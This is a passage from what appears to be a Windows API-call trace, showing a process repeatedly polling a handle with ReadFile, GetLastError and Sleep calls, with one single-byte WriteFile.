	[0249.164] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0249.164] GetLastError () returned 0x218
	[0249.164] Sleep (dwMilliseconds=0xa) 
	[0249.242] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0249.242] GetLastError () returned 0x218
	[0249.242] Sleep (dwMilliseconds=0xa) 
	[0249.258] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0249.258] GetLastError () returned 0x218
	[0249.258] Sleep (dwMilliseconds=0xa) 
	[0249.274] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0249.274] GetLastError () returned 0x218
	[0249.274] Sleep (dwMilliseconds=0x3e8) 
	[0250.474] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0250.474] Sleep (dwMilliseconds=0xa) 
	[0250.534] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.534] GetLastError () returned 0x218
	[0250.534] Sleep (dwMilliseconds=0xa) 
	[0250.606] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.606] GetLastError () returned 0x218
	[0250.606] Sleep (dwMilliseconds=0xa) 
	[0250.648] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.648] GetLastError () returned 0x218
	[0250.648] Sleep (dwMilliseconds=0xa) 
	[0250.686] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.686] GetLastError () returned 0x218
	[0250.686] Sleep (dwMilliseconds=0xa) 
	[0250.712] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.712] GetLastError () returned 0x218
	[0250.712] Sleep (dwMilliseconds=0xa) 
	[0250.724] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.724] GetLastError () returned 0x218
	[0250.724] Sleep (dwMilliseconds=0xa) 
	[0250.739] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.739] GetLastError () returned 0x218
	[0250.740] Sleep (dwMilliseconds=0xa) 
	[0250.756] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.756] GetLastError () returned 0x218
	[0250.756] Sleep (dwMilliseconds=0xa) 
	[0250.771] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.771] GetLastError () returned 0x218
	[0250.771] Sleep (dwMilliseconds=0xa) 
	[0250.786] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.787] GetLastError () returned 0x218
	[0250.787] Sleep (dwMilliseconds=0xa) 
	[0250.802] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.802] GetLastError () returned 0x218
	[0250.802] Sleep (dwMilliseconds=0xa) 
	[0250.818] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.818] GetLastError () returned 0x218
	[0250.818] Sleep (dwMilliseconds=0xa) 
	[0250.864] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.864] GetLastError () returned 0x218
	[0250.864] Sleep (dwMilliseconds=0xa) 
	[0250.904] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.904] GetLastError () returned 0x218
	[0250.904] Sleep (dwMilliseconds=0xa) 
	[0250.942] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.942] GetLastError () returned 0x218
	[0250.942] Sleep (dwMilliseconds=0xa) 
	[0250.961] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.961] GetLastError () returned 0x218
	[0250.961] Sleep (dwMilliseconds=0xa) 
	[0250.975] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.975] GetLastError () returned 0x218
	[0250.975] Sleep (dwMilliseconds=0xa) 
	[0250.989] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0250.989] GetLastError () returned 0x218
	[0250.989] Sleep (dwMilliseconds=0xa) 
	[0251.005] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.005] GetLastError () returned 0x218
	[0251.005] Sleep (dwMilliseconds=0xa) 
	[0251.020] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.020] GetLastError () returned 0x218
	[0251.020] Sleep (dwMilliseconds=0xa) 
	[0251.036] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.036] GetLastError () returned 0x218
	[0251.036] Sleep (dwMilliseconds=0xa) 
	[0251.052] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.052] GetLastError () returned 0x218
	[0251.052] Sleep (dwMilliseconds=0xa) 
	[0251.067] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.067] GetLastError () returned 0x218
	[0251.067] Sleep (dwMilliseconds=0xa) 
	[0251.114] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.114] GetLastError () returned 0x218
	[0251.114] Sleep (dwMilliseconds=0xa) 
	[0251.160] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.161] GetLastError () returned 0x218
	[0251.161] Sleep (dwMilliseconds=0xa) 
	[0251.209] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.209] GetLastError () returned 0x218
	[0251.209] Sleep (dwMilliseconds=0xa) 
	[0251.223] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.223] GetLastError () returned 0x218
	[0251.223] Sleep (dwMilliseconds=0xa) 
	[0251.239] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.239] GetLastError () returned 0x218
	[0251.239] Sleep (dwMilliseconds=0xa) 
	[0251.254] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.254] GetLastError () returned 0x218
	[0251.254] Sleep (dwMilliseconds=0xa) 
	[0251.270] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.270] GetLastError () returned 0x218
	[0251.270] Sleep (dwMilliseconds=0xa) 
	[0251.286] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.286] GetLastError () returned 0x218
	[0251.286] Sleep (dwMilliseconds=0xa) 
	[0251.302] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.302] GetLastError () returned 0x218
	[0251.302] Sleep (dwMilliseconds=0xa) 
	[0251.317] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.317] GetLastError () returned 0x218
	[0251.317] Sleep (dwMilliseconds=0xa) 
	[0251.410] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.410] GetLastError () returned 0x218
	[0251.410] Sleep (dwMilliseconds=0xa) 
	[0251.472] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.473] GetLastError () returned 0x218
	[0251.473] Sleep (dwMilliseconds=0xa) 
	[0251.520] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.520] GetLastError () returned 0x218
	[0251.520] Sleep (dwMilliseconds=0xa) 
	[0251.546] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.546] GetLastError () returned 0x218
	[0251.546] Sleep (dwMilliseconds=0xa) 
	[0251.554] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.554] GetLastError () returned 0x218
	[0251.554] Sleep (dwMilliseconds=0xa) 
	[0251.566] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.566] GetLastError () returned 0x218
	[0251.566] Sleep (dwMilliseconds=0xa) 
	[0251.582] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.582] GetLastError () returned 0x218
	[0251.582] Sleep (dwMilliseconds=0xa) 
	[0251.597] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.598] GetLastError () returned 0x218
	[0251.598] Sleep (dwMilliseconds=0xa) 
	[0251.613] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.613] GetLastError () returned 0x218
	[0251.613] Sleep (dwMilliseconds=0xa) 
	[0251.657] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.657] GetLastError () returned 0x218
	[0251.657] Sleep (dwMilliseconds=0xa) 
	[0251.691] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.691] GetLastError () returned 0x218
	[0251.691] Sleep (dwMilliseconds=0xa) 
	[0251.738] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.738] GetLastError () returned 0x218
	[0251.738] Sleep (dwMilliseconds=0xa) 
	[0251.785] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.785] GetLastError () returned 0x218
	[0251.785] Sleep (dwMilliseconds=0xa) 
	[0251.809] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.810] GetLastError () returned 0x218
	[0251.810] Sleep (dwMilliseconds=0xa) 
	[0251.816] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.816] GetLastError () returned 0x218
	[0251.816] Sleep (dwMilliseconds=0xa) 
	[0251.831] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.832] GetLastError () returned 0x218
	[0251.832] Sleep (dwMilliseconds=0xa) 
	[0251.847] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.847] GetLastError () returned 0x218
	[0251.847] Sleep (dwMilliseconds=0xa) 
	[0251.863] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.863] GetLastError () returned 0x218
	[0251.863] Sleep (dwMilliseconds=0xa) 
	[0251.878] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.878] GetLastError () returned 0x218
	[0251.878] Sleep (dwMilliseconds=0xa) 
	[0251.894] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.894] GetLastError () returned 0x218
	[0251.894] Sleep (dwMilliseconds=0xa) 
	[0251.909] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.909] GetLastError () returned 0x218
	[0251.910] Sleep (dwMilliseconds=0xa) 
	[0251.957] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0251.957] GetLastError () returned 0x218
	[0251.957] Sleep (dwMilliseconds=0xa) 
	[0252.003] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.003] GetLastError () returned 0x218
	[0252.003] Sleep (dwMilliseconds=0xa) 
	[0252.051] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.051] GetLastError () returned 0x218
	[0252.051] Sleep (dwMilliseconds=0xa) 
	[0252.068] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.068] GetLastError () returned 0x218
	[0252.068] Sleep (dwMilliseconds=0xa) 
	[0252.081] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.081] GetLastError () returned 0x218
	[0252.081] Sleep (dwMilliseconds=0xa) 
	[0252.097] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.097] GetLastError () returned 0x218
	[0252.097] Sleep (dwMilliseconds=0xa) 
	[0252.112] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.112] GetLastError () returned 0x218
	[0252.113] Sleep (dwMilliseconds=0xa) 
	[0252.129] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.130] GetLastError () returned 0x218
	[0252.130] Sleep (dwMilliseconds=0xa) 
	[0252.144] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.144] GetLastError () returned 0x218
	[0252.144] Sleep (dwMilliseconds=0xa) 
	[0252.159] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.159] GetLastError () returned 0x218
	[0252.159] Sleep (dwMilliseconds=0xa) 
	[0252.175] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.175] GetLastError () returned 0x218
	[0252.175] Sleep (dwMilliseconds=0xa) 
	[0252.221] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.221] GetLastError () returned 0x218
	[0252.221] Sleep (dwMilliseconds=0xa) 
	[0252.271] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.271] GetLastError () returned 0x218
	[0252.271] Sleep (dwMilliseconds=0xa) 
	[0252.315] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.315] GetLastError () returned 0x218
	[0252.315] Sleep (dwMilliseconds=0xa) 
	[0252.315] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.315] GetLastError () returned 0x218
	[0252.315] Sleep (dwMilliseconds=0xa) 
	[0252.348] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.348] GetLastError () returned 0x218
	[0252.348] Sleep (dwMilliseconds=0xa) 
	[0252.362] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.362] GetLastError () returned 0x218
	[0252.362] Sleep (dwMilliseconds=0xa) 
